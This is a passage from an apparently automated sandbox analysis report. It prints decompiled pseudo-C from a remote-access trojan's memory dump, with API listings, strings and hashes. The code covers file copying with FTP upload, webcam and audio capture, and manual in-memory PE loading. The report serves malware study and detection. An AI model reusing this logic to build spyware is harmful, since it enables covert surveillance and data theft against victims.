                                    					_t105 = E240163E8(_v1212,  &_v368, 0x2f);
                                    					__eflags = _t105;
                                    					if(_t105 != 0) {
                                    						__eflags = _v9;
                                    						if(_v9 == 0) {
                                    							goto L23;
                                    						} else {
                                    							E24013388( &_v1756, 0x24043244, _v16);
                                    							_t118 = E240163E8(_v1756,  &_v368, 0x10);
                                    							__eflags = _t118;
                                    							if(_t118 != 0) {
                                    								goto L23;
                                    							} else {
                                    								__eflags = 0;
                                    								_push(_t293);
                                    								_push(0x240431a5);
                                    								_push( *[fs:eax]);
                                    								 *[fs:eax] = _t294;
                                    								do {
                                    									__eflags = _v360 & 0x00000010;
                                    									if((_v360 & 0x00000010) != 0) {
                                    										E24013480(_v356, 0x24043250);
                                    										if(__eflags != 0) {
                                    											E24013480(_v356, 0x2404325c);
                                    											if(__eflags != 0) {
                                    												E24013388( &_v1760, _v356, _v16);
                                    												E24042DC8(_v1760, _t202, _v8, _t286, _t290);
                                    											}
                                    										}
                                    									}
                                    									_t121 = E24015E5C( &_v368);
                                    									__eflags = _t121;
                                    								} while (_t121 == 0);
                                    								__eflags = 0;
                                    								_pop(_t255);
                                    								 *[fs:eax] = _t255;
                                    								_push(0x240431ac);
                                    								return E24015DDC( &_v368);
                                    							}
                                    						}
                                    					} else {
                                    						__eflags = 0;
                                    						_push(_t293);
                                    						_push(0x240430dc);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t294;
                                    						do {
                                    							_t203 = E24012658(1);
                                    							_t291 =  &_v344;
                                    							memcpy( &_v1200,  &_v344, 0x50 << 2);
                                    							_t294 = _t294 + 0xc;
                                    							_push( &_v1468);
                                    							E240132EC( &_v1732, 0x104,  &_v300);
                                    							E240171A8(_v1732, 0x104,  &_v1728);
                                    							E24013318( &_v1724, 0xff, _v1728);
                                    							_push( &_v1724);
                                    							E240132EC( &_v1740, 0x104,  &_v300);
                                    							E24013388( &_v1736, _v1740, _v16);
                                    							_pop(_t265);
                                    							E240404A4(_t135, _t265,  &_v344 + 0xa0,  &_v344, __eflags);
                                    							E24011BD8( &_v880,  &_v1468);
                                    							E24013318( &_v624, 0xff, _v16);
                                    							E24023314(_t135, 0x340,  &_v1200);
                                    							E24023024(_t135, 0x340,  &_v1744);
                                    							E24013344(0x24063270, _v1744);
                                    							E24012688(_t135);
                                    							E24017038( &_v1748);
                                    							_push(_v1748);
                                    							E240158BC( &_v1752, 0x340, 0, GetTickCount(), 0);
                                    							_push(_v1752);
                                    							_push(".tmp");
                                    							E240133FC();
                                    							E24016DA0(_v24, _t203, 0, 0,  &_v344, __eflags);
                                    							E24016634(_v24, _t203,  &_v344 + 0xa0, _t291, __eflags);
                                    							_t174 = E24015E5C( &_v368);
                                    							__eflags = _t174;
                                    						} while (_t174 == 0);
                                    						__eflags = 0;
                                    						_pop(_t274);
                                    						 *[fs:eax] = _t274;
                                    						_push(0x240430e3);
                                    						return E24015DDC( &_v368);
                                    					}
                                    				} else {
                                    					E24013120( &_v20, _v16);
                                    					E240135D0( &_v20, E24013674(0x24043210, _v20), 1);
                                    					while(E24013674(0x24043210, _v20) > 0) {
                                    						Sleep(0x32);
                                    						_push(_t293);
                                    						_push(0x24042ec5);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t294;
                                    						E24013590(_v20, E24013674(0x24043210, _v20) - 1, 1,  &_v1208);
                                    						E24042DC8(_v1208, _t202, _v8, _t286, _t290);
                                    						_pop(_t283);
                                    						 *[fs:eax] = _t283;
                                    						E240135D0( &_v20, E24013674(0x24043210, _v20), 1);
                                    					}
                                    					L23:
                                    					_pop(_t247);
                                    					 *[fs:eax] = _t247;
                                    					_push(0x240431ff);
                                    					E240130AC( &_v1760, 9);
                                    					E240130AC( &_v1212, 3);
                                    					_t250 =  *0x24015a98; // 0x24015a9c
                                    					E24013A90( &_v368, _t250);
                                    					return E240130AC( &_v24, 3);
                                    				}
                                    			}

                                    APIs
                                    • Sleep.KERNEL32(00000032,?,00000000,240431F8,?,?,?,?,00000000,00000000), ref: 24042E74
                                      • Part of subcall function 24042DC8: GetTickCount.KERNEL32 ref: 24043070
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CountSleepTick
                                    • String ID: *.*$.tmp$ALL
                                    • API String ID: 2804873075-513194922
                                    • Opcode ID: 05c95c787f79140aac0fd1a93eac47bd873772d9fdbcd2238e0cd6e5beac0b46
                                    • Instruction ID: 33b6452aa6304aa3cc7d468c1b9af40279b63bf055704219c3b8e73a8938a811
                                    • Opcode Fuzzy Hash: 05c95c787f79140aac0fd1a93eac47bd873772d9fdbcd2238e0cd6e5beac0b46
                                    • Instruction Fuzzy Hash: 73B14F34B002199BFF11DB60DC90AEEB3B5EB99308F5085F5D808A7258DAB5AEC58F50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E240500AC(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				intOrPtr* _t37;
                                    				void* _t44;
                                    				intOrPtr* _t45;
                                    				char* _t46;
                                    				intOrPtr* _t63;
                                    				intOrPtr* _t82;
                                    				intOrPtr* _t84;
                                    				intOrPtr* _t86;
                                    				void* _t95;
                                    				CHAR* _t103;
                                    				void* _t104;
                                    				void* _t105;
                                    				intOrPtr* _t109;
                                    				void* _t112;
                                    				intOrPtr _t113;
                                    				intOrPtr* _t124;
                                    				void* _t127;
                                    				void* _t128;
                                    				intOrPtr _t130;
                                    				intOrPtr _t131;
                                    
                                    				_t128 = __esi;
                                    				_t127 = __edi;
                                    				_t112 = __edx;
                                    				_t102 = __ebx;
                                    				_t130 = _t131;
                                    				_t105 = 7;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t105 = _t105 - 1;
                                    				} while (_t105 != 0);
                                    				_push(__ebx);
                                    				_push(_t130);
                                    				_push(0x240502d7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t131;
                                    				_t37 =  *0x2405ac44; // 0x240572fc
                                    				_t133 =  *_t37;
                                    				if( *_t37 == 0) {
                                    					L18:
                                    					_pop(_t113);
                                    					 *[fs:eax] = _t113;
                                    					_push(E240502DE);
                                    					E240130AC( &_v60, 0xb);
                                    					return E240130AC( &_v12, 2);
                                    				}
                                    				_t44 = E24016438( *0x240632f0, __ebx, _t105, _t133);
                                    				if(_t112 != 0) {
                                    					if(__eflags <= 0) {
                                    						goto L18;
                                    					}
                                    					L7:
                                    					_t45 =  *0x2405ac18; // 0x240570d8
                                    					if( *_t45 != 0) {
                                    						_t46 =  *0x2405ac54; // 0x2405b91a
                                    						_t137 =  *_t46 - 1;
                                    						if( *_t46 == 1) {
                                    							E24016588( *0x240632f0, _t102,  &_v24, _t127, _t128, _t137);
                                    							_push(_v24);
                                    							E240158BC( &_v28, _t105, 0, GetTickCount(), 0);
                                    							_push(_v28);
                                    							_push(".txt");
                                    							E240133FC();
                                    							_t103 = E24013534(_v20);
                                    							CopyFileA(E24013534( *0x240632f0), _t103, 0);
                                    							SetFileAttributesA(_t103, 0x80);
                                    							_t108 =  &_v12;
                                    							E24016CE4(_v20, _t103,  &_v12,  &_v16, _t127, _t128, _t137);
                                    							E24016634(_v20, _t103, _t127, _t128, _t137);
                                    							_t138 = _v12;
                                    							if(_v12 != 0) {
                                    								_t63 =  *0x2405ac60; // 0x2405b988
                                    								_push( *_t63);
                                    								_push(0x240502fc);
                                    								E24017064( &_v36, _t103, _t138);
                                    								E24021B5C(_v36, _t103,  &_v32, _t127, _t128, _t138);
                                    								_push(_v32);
                                    								E240133FC();
                                    								_push(_v8);
                                    								_push(0x240502fc);
                                    								E24016BD0( &_v40, _t103,  &_v12);
                                    								_push(_v40);
                                    								_push(0x24050308);
                                    								E24016B28( &_v44, _t103, _t108);
                                    								_push(_v44);
                                    								_push(0x24050308);
                                    								E24016B08( &_v48);
                                    								_push(_v48);
                                    								_push("___");
                                    								E24016910( &_v52, _t103, _t108);
                                    								_push(_v52);
                                    								_push(0x24050308);
                                    								E240169B8( &_v56, _t103, _t108);
                                    								_push(_v56);
                                    								_push(0x24050308);
                                    								E24016A60( &_v60, _t103, _t108);
                                    								_push(_v60);
                                    								E240133FC();
                                    								_t82 =  *0x2405aba0; // 0x2405b924
                                    								_t84 =  *0x2405abc0; // 0x2405b928
                                    								_t86 =  *0x2405ab20; // 0x2405b92c
                                    								_t109 =  *0x2405ac2c; // 0x2405b91c
                                    								_t104 = E24022134(_t103,  *_t109, 1, _t127, _t128,  *_t86,  *_t84,  *_t82);
                                    								if(_t104 == 0 ||  *((char*)(_t104 + 0x18)) == 0) {
                                    									E24012688(_t104);
                                    								} else {
                                    									_t124 =  *0x2405ab64; // 0x2405b920
                                    									__eflags = E240222A8(_t104, _t104,  *_t124, __eflags);
                                    									if(__eflags != 0) {
                                    										_t95 = E240223C4(_t104, _t104, _v8, _v12, _t128, __eflags);
                                    										__eflags = _t95;
                                    										if(_t95 != 0) {
                                    											E24012688(_t104);
                                    										} else {
                                    											E24012688(_t104);
                                    										}
                                    									} else {
                                    										E24012688(_t104);
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					goto L18;
                                    				}
                                    				if(_t44 <= 0) {
                                    					goto L18;
                                    				} else {
                                    					goto L7;
                                    				}
                                    			}

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 24050124
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24050162
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,.txt,?,00000000,00000000,?,00000000,240502D7,?,?,00000000,00000000), ref: 2405016D
                                      • Part of subcall function 24022134: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 240221C0
                                      • Part of subcall function 24022134: InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000001,08000000,00000000), ref: 240221F8
                                      • Part of subcall function 240223C4: FtpOpenFileA.WININET(00000000,00000000,40000000,00000002,00000000), ref: 24022431
                                      • Part of subcall function 240223C4: InternetWriteFile.WININET(00000000,?,00000001,?), ref: 2402248F
                                      • Part of subcall function 240223C4: InternetCloseHandle.WININET(00000000), ref: 240224DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileInternet$Open$AttributesCloseConnectCopyCountHandleTickWrite
                                    • String ID: .txt$___
                                    • API String ID: 3003208719-4103982732
                                    • Opcode ID: 45d66a4ddc082909df97957d8a8f78d3f16ed1ed7300586d1d6a09c7747f7f16
                                    • Instruction ID: 04776145ebd19304adb770b2ee5b1acf71dd72999ae551442157f32a282f07b1
                                    • Opcode Fuzzy Hash: 45d66a4ddc082909df97957d8a8f78d3f16ed1ed7300586d1d6a09c7747f7f16
                                    • Instruction Fuzzy Hash: 8F511834A0020AABEB01DFE4DC91F9D77BAFB68204F504475E504B7269CA78AEC9CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2403F404(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				long _v16;
                                    				int _v20;
                                    				int _v24;
                                    				void* _t18;
                                    				intOrPtr _t21;
                                    				struct HWND__* _t23;
                                    				int _t31;
                                    				int _t32;
                                    
                                    				_t31 = _a12;
                                    				_t32 = _a8;
                                    				_t23 = _a4;
                                    				_v8 = CallWindowProcA(GetPropA(_t23, "WNDPROC"), _t23, _t32, _t31, _a16);
                                    				_t18 = GetPropA(_t23, "OBJECT");
                                    				if(_t32 != 2) {
                                    					if(_t18 != 0) {
                                    						_v24 = _t32;
                                    						_v20 = _t31;
                                    						_v16 = _a16;
                                    						_v12 = 0;
                                    						 *((intOrPtr*)( *_t18 - 0x14))();
                                    						_t21 = _v12;
                                    						if(_t21 != 0) {
                                    							_v8 = _t21;
                                    						}
                                    					}
                                    				} else {
                                    					if(_t18 != 0) {
                                    						E24012688(_t18);
                                    					}
                                    				}
                                    				return _v8;
                                    			}

                                    APIs
                                    • GetPropA.USER32(?,WNDPROC), ref: 2403F41C
                                    • CallWindowProcA.USER32(00000000,?,?,?,?), ref: 2403F429
                                    • GetPropA.USER32(?,OBJECT), ref: 2403F437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Prop$CallProcWindow
                                    • String ID: OBJECT$WNDPROC
                                    • API String ID: 1345539330-55689305
                                    • Opcode ID: 02d8c39e52fd66965a58d18379e46cf3b3a799ad8818a7a8c15a848fcf096884
                                    • Instruction ID: 561acebf9efbeba925220d79ff6d927574f2c54d9b131808e70b47fb4e9d7421
                                    • Opcode Fuzzy Hash: 02d8c39e52fd66965a58d18379e46cf3b3a799ad8818a7a8c15a848fcf096884
                                    • Instruction Fuzzy Hash: 580156B1A00209BB9B00DF66CD84D9FBFFDEF85250B108165E915AB244D730DE40CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E2403B624() {
                                    				struct HWND__* _t1;
                                    
                                    				_push(1);
                                    				_t1 =  *0x2405ca68;
                                    				_push(_t1);
                                    				_push(0x1e0);
                                    				_push(0x280);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0x50000000);
                                    				_push("Video");
                                    				L2403B504();
                                    				 *0x2405ca6c = _t1;
                                    				SendMessageA( *0x2405ca6c, 0x40b, 0, 0);
                                    				 *0x2405ca6c = 0;
                                    				return UnregisterClassA("MainForm",  *0x2405caa4);
                                    			}

                                    APIs
                                    • 6F6121E0.AVICAP32(Video,50000000,00000000,00000000,00000280,000001E0,?,00000001,24049038,000003E8,000003E8,2404E184,webcamgetbuffer,2404E184,webcam,2404E184), ref: 2403B644
                                    • SendMessageA.USER32(?,0000040B,00000000,00000000), ref: 2403B65D
                                    • UnregisterClassA.USER32(MainForm,?), ref: 2403B674
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ClassF6121MessageSendUnregister
                                    • String ID: MainForm$Video
                                    • API String ID: 3997333328-2964836702
                                    • Opcode ID: 3911707d7f9b5fd558a74f7fa3bd5462fc4cdd8281d34963ba894ee815b95535
                                    • Instruction ID: 2565729db35380ffbebeb2c9aae85dcdf7f2c0039150ca2de86303e26dd26cdf
                                    • Opcode Fuzzy Hash: 3911707d7f9b5fd558a74f7fa3bd5462fc4cdd8281d34963ba894ee815b95535
                                    • Instruction Fuzzy Hash: 45E00AB1A842507BF750EFA9CC52F552EA8E754B0DF944420F704FE5C5D5AC66C08F18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E24054594(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, intOrPtr _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				long _v32;
                                    				char _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				void* _v48;
                                    				signed int _v52;
                                    				long _v56;
                                    				char _v60;
                                    				void* _t135;
                                    				intOrPtr _t138;
                                    				void* _t150;
                                    				signed int _t184;
                                    				signed int _t185;
                                    				intOrPtr _t189;
                                    				intOrPtr _t197;
                                    				intOrPtr _t204;
                                    				intOrPtr _t205;
                                    				signed int _t209;
                                    				signed int _t210;
                                    				void* _t213;
                                    				void* _t216;
                                    				intOrPtr* _t217;
                                    
                                    				_t208 = __edi;
                                    				_t215 = _t216;
                                    				_t217 = _t216 + 0xffffffc8;
                                    				_push(__edi);
                                    				_v44 = __ecx;
                                    				_t183 = __edx;
                                    				_v40 = __eax;
                                    				_t197 =  *0x24053e90; // 0x24053e94
                                    				E240139CC( &_v36, _t197);
                                    				_push(_t216);
                                    				_push(0x2405478e);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t217;
                                    				_push(0);
                                    				_push(_v44);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_v8 =  *((intOrPtr*)(_v44 + 0x3c)) +  *_t217;
                                    				_v16 = VirtualAlloc(__edx,  *(_v8 + 0x50), 0x2000, 1);
                                    				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
                                    				_v48 = VirtualAlloc(_v16,  *(_v8 + 0x54), 0x1000, 4);
                                    				E24011494(_v44,  *(_v8 + 0x54), _v48);
                                    				VirtualProtect(_v48,  *(_v8 + 0x54), 2,  &_v56);
                                    				_t213 = _v8 + 0x18 + ( *(_v8 + 0x14) & 0x0000ffff);
                                    				_t135 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t135 >= 0) {
                                    					_v60 = _t135 + 1;
                                    					_t185 = 0;
                                    					do {
                                    						_t208 =  *(_t213 + 8 + (_t185 + _t185 * 4) * 8);
                                    						_v52 =  *((intOrPtr*)(_t213 + 0x10 + (_t185 + _t185 * 4) * 8));
                                    						if(_t208 < _v52) {
                                    							_t210 = _t208 ^ _v52;
                                    							_v52 = _v52 ^ _t210;
                                    							_t208 = _t210 ^ _v52;
                                    						}
                                    						_v48 = VirtualAlloc( *((intOrPtr*)(_t213 + 0xc + (_t185 + _t185 * 4) * 8)) + _v16, _t208, 0x1000, 4);
                                    						E24011CF0(_v48, _t208);
                                    						E24011494( *((intOrPtr*)(_t213 + 0x14 + (_t185 + _t185 * 4) * 8)) + _v44, _v52, _v48);
                                    						_t185 = _t185 + 1;
                                    						_t66 =  &_v60;
                                    						 *_t66 = _v60 - 1;
                                    					} while ( *_t66 != 0);
                                    				}
                                    				_t138 =  *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                    				_v28 = _t138;
                                    				_v24 = _t138;
                                    				_v36 = _v16;
                                    				_v32 =  *(_v8 + 0x50);
                                    				_push(0);
                                    				E240144F4();
                                    				_t145 =  *((intOrPtr*)(_v8 + 0xa0));
                                    				if( *((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                    					E240543DC(_t145 + _v16, _t215);
                                    				}
                                    				_t147 =  *((intOrPtr*)(_v8 + 0x80));
                                    				if( *((intOrPtr*)(_v8 + 0x80)) != 0) {
                                    					E24054458(_t147 + _v16, _t183, _t208, _t213, _t215);
                                    				}
                                    				_t150 = ( *(_v8 + 6) & 0x0000ffff) - 1;
                                    				if(_t150 >= 0) {
                                    					_v60 = _t150 + 1;
                                    					_t184 = 0;
                                    					do {
                                    						_t209 = _t184 + _t184 * 4;
                                    						VirtualProtect( *((intOrPtr*)(_t213 + 0xc + _t209 * 8)) + _v16,  *(_t213 + 8 + _t209 * 8), E2405436C( *((intOrPtr*)(_t213 + 0x24 + _t209 * 8))),  &_v56);
                                    						_t184 = _t184 + 1;
                                    						_t101 =  &_v60;
                                    						 *_t101 = _v60 - 1;
                                    					} while ( *_t101 != 0);
                                    				}
                                    				_t189 =  *0x24053e90; // 0x24053e94
                                    				E24013CA4(_a4, _t189,  &_v36);
                                    				_pop(_t204);
                                    				 *[fs:eax] = _t204;
                                    				_push(0x24054795);
                                    				_t205 =  *0x24053e90; // 0x24053e94
                                    				return E24013A90( &_v36, _t205);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 240545EB
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00002000,00000001), ref: 24054611
                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 2405463B
                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,?,?,00002000,00000001), ref: 24054693
                                    • VirtualProtect.KERNEL32(?,?,00000000,?,00000001), ref: 24054756
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$Protect
                                    • String ID:
                                    • API String ID: 655996629-0
                                    • Opcode ID: 80409a3382d9cca7a2fd7ecdd1f5b95de010cff772ed018fb5c22d58ce477088
                                    • Instruction ID: 1c9ff9165b438982143258646b9eeb421bfae3b6bbe099b1f608e48deb78317f
                                    • Opcode Fuzzy Hash: 80409a3382d9cca7a2fd7ecdd1f5b95de010cff772ed018fb5c22d58ce477088
                                    • Instruction Fuzzy Hash: 6C71BE75A00208AFDB01CFA8D984EEEB7F9FF48314F558065E904EB265D670EE94CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E24041FE4(void* __ebx, void* __edi, void* __esi) {
                                    				short _v8;
                                    				short _v10;
                                    				intOrPtr _v14;
                                    				signed int _v18;
                                    				signed int _v20;
                                    				char _v28;
                                    				intOrPtr _t53;
                                    				short _t87;
                                    				intOrPtr _t103;
                                    				intOrPtr _t114;
                                    				intOrPtr _t117;
                                    				intOrPtr _t118;
                                    				void* _t122;
                                    				void* _t123;
                                    				intOrPtr _t124;
                                    
                                    				_t120 = __esi;
                                    				_t119 = __edi;
                                    				_t85 = __ebx;
                                    				_t122 = _t123;
                                    				_t124 = _t123 + 0xffffffe8;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v28 = 0;
                                    				_push(_t122);
                                    				_push(0x24042284);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t124;
                                    				if( *0x24063244 != 0) {
                                    					E24012688( *0x24063244);
                                    					 *0x24063244 = 0;
                                    				}
                                    				 *0x24063244 = E24012658(1);
                                    				E24041B9C();
                                    				 *0x24063248 = 0;
                                    				_push(_t122);
                                    				_push(0x24042222);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t124;
                                    				 *0x24063240 = E24012658(1);
                                    				E24022908( *0x24063240, _t85,  *0x24063230,  *0x2406322c, _t119, _t120, 0);
                                    				_push(_t122);
                                    				_push(0x240420d2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t124;
                                    				_push( *0x24063228);
                                    				_push("|Y|");
                                    				_push("resposta");
                                    				_push(0x240422bc);
                                    				_push( *0x24063234);
                                    				_push(0x240422bc);
                                    				_push("audio");
                                    				_push(0x240422bc);
                                    				_push("audiogetbuffer");
                                    				E240133FC();
                                    				E24038F28( *0x24063240, _t85, _v28, _t119, _t120, 0);
                                    				_t103 = 0x240422bc;
                                    				 *[fs:eax] = _t103;
                                    				Sleep(0x3e8);
                                    				if( *((char*)( *0x24063240 + 0x10)) != 0) {
                                    					_v18 =  *0x24063238;
                                    					_v20 =  *0x2406323c;
                                    					_v8 = 0x10;
                                    					_v14 = (_v20 & 0x0000ffff) * _v18 + (_v20 & 0x0000ffff) * _v18;
                                    					_t87 = _v20 + _v20;
                                    					_v10 = _t87;
                                    					__eflags =  *0x24063220;
                                    					if( *0x24063220 == 0) {
                                    						 *0x24063220 = E24041294(1);
                                    					}
                                    					__eflags =  *0x24063224;
                                    					if( *0x24063224 == 0) {
                                    						 *0x24063224 = E24041760(1);
                                    					}
                                    					_t53 =  *0x24063224;
                                    					 *((intOrPtr*)(_t53 + 0xa4)) =  *0x24063244;
                                    					 *((intOrPtr*)(_t53 + 0xa0)) = E24041F5C;
                                    					 *((short*)( *0x24063220 + 0x15e)) = _v20;
                                    					 *( *0x24063220 + 0x160) = _v18;
                                    					 *((intOrPtr*)( *0x24063220 + 0x164)) = _v14;
                                    					 *((short*)( *0x24063220 + 0x168)) = _t87;
                                    					 *((short*)( *0x24063220 + 0x16a)) = _v8;
                                    					E24041504( *0x24063220,  *((intOrPtr*)( *0x24063220 + 0x164)));
                                    					E24041A30( *0x24063224,  *((intOrPtr*)( *0x24063220 + 0xf8)));
                                    					E240414E8( *0x24063220, 1);
                                    					E240418F8( *0x24063220 + 0x15c);
                                    					_pop(_t114);
                                    					 *[fs:eax] = _t114;
                                    					L10:
                                    					E24038298();
                                    					goto L10;
                                    				}
                                    				E24012688( *0x24063240);
                                    				_pop(_t117);
                                    				 *[fs:eax] = _t117;
                                    				_pop(_t118);
                                    				 *[fs:eax] = _t118;
                                    				_push(0x2404228b);
                                    				return E24013088( &_v28);
                                    			}

                                    [Instruction address column for the listing above (decompiler line-to-address map, flattened by extraction): 84 entries, first 0x24041fe4, last 0x24042283]

                                    APIs
                                    • Sleep.KERNEL32(000003E8,audio,240422BC,240422BC,resposta,|Y|,00000000,240420D2,?,00000000,24042222,?,00000000,24042284), ref: 240420E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: audio$audiogetbuffer$resposta$|Y|
                                    • API String ID: 3472027048-441611841
                                    • Opcode ID: 93577e2af3532f6d87b5c6bdfdf9687f720a853cbcf13409bb80e1f71573984e
                                    • Instruction ID: d092f3f74fd2ef38590b8f0dc71deadef427819ff1d6f00f2290d1a6b2f2aeba
                                    • Opcode Fuzzy Hash: 93577e2af3532f6d87b5c6bdfdf9687f720a853cbcf13409bb80e1f71573984e
                                    • Instruction Fuzzy Hash: C2516A34A00206EFD301DF64D994A9A7BF0FB5C704F5185B9F815AB769D7B99AC0CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E2403ADC0(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v352;
                                    				char _v33121;
                                    				char _v33128;
                                    				char _v33132;
                                    				char _v33136;
                                    				void* _t41;
                                    				intOrPtr* _t51;
                                    				intOrPtr* _t52;
                                    				char* _t58;
                                    				long _t67;
                                    				void* _t92;
                                    				intOrPtr _t107;
                                    				intOrPtr _t112;
                                    				void* _t114;
                                    				void* _t115;
                                    				intOrPtr _t116;
                                    
                                    				_t110 = __edi;
                                    				_t93 = __ecx;
                                    				_t114 = _t115;
                                    				_push(__eax);
                                    				_t41 = 8;
                                    				do {
                                    					_t115 = _t115 + 0xfffff004;
                                    					_push(_t41);
                                    					_t41 = _t41 - 1;
                                    				} while (_t41 != 0);
                                    				_t116 = _t115 + 0xfffffe98;
                                    				_push(__edi);
                                    				_v33132 = 0;
                                    				_v33136 = 0;
                                    				_v33128 = 0;
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t112 = _v8;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				_push(_t114);
                                    				_push(0x2403b027);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t116;
                                    				_t92 = 0;
                                    				_v20 = E24012658(1);
                                    				while( *((char*)(_v20 + 0x10)) == 0) {
                                    					_t119 = _t92 - 0xa;
                                    					if(_t92 < 0xa) {
                                    						E24022B24(_t112,  &_v33128);
                                    						_push(_v33128);
                                    						_t93 = E24022B58(_t112);
                                    						_pop(1);
                                    						E24022908(_v20, _t92, _t87, 1, _t110, _t112, __eflags);
                                    						Sleep(0xa);
                                    						_t92 = _t92 + 1;
                                    						__eflags = _t92;
                                    						continue;
                                    					}
                                    					break;
                                    				}
                                    				_t51 =  *0x2405abb0; // 0x2405b8dc
                                    				_push( *_t51);
                                    				_push("|Y|");
                                    				_push("resposta");
                                    				_push(0x2403b060);
                                    				_t52 =  *0x2405abec; // 0x2405b98c
                                    				_push( *_t52);
                                    				_push(0x2403b060);
                                    				_push(_v8);
                                    				E240158BC( &_v33136, _t93, 1, _a16, _a20);
                                    				_push(_v33136);
                                    				_push(0x2403b060);
                                    				E240133FC();
                                    				E24038F28(_v20, _t92, _v33132, _t110, _t112, _t119);
                                    				Sleep(0x3e8);
                                    				_push(_t114);
                                    				_push(0x2403afad);
                                    				_push( *[fs:edx]);
                                    				 *[fs:edx] = _t116;
                                    				_t58 =  *0x2405ac0c; // 0x2405700c
                                    				 *_t58 = 0;
                                    				E240119B8( &_v352, _v12, _t119);
                                    				E24011428(E24011FF8());
                                    				if(_a12 != 0) {
